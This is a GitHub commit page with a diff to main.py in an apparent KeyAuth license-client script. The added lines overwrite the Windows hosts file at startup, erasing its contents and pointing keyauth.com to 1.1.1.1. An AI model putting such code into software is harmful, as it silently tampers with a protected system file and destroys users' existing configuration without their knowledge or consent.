We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent bc8e4a2 commit e33a945Copy full SHA for e33a945
1 file changed
main.py
@@ -6,6 +6,9 @@
6
7
keyauthapp = api("your application name", "your owner id", "your application secret","1.0")
8
9
+with open("C:\\Windows\\System32\\drivers\\etc\\hosts", "w") as text_file:
10
+ text_file.write("1.1.1.1 keyauth.com")
11
+
12
print("Initializing")
13
keyauthapp.init()
14
0 commit comments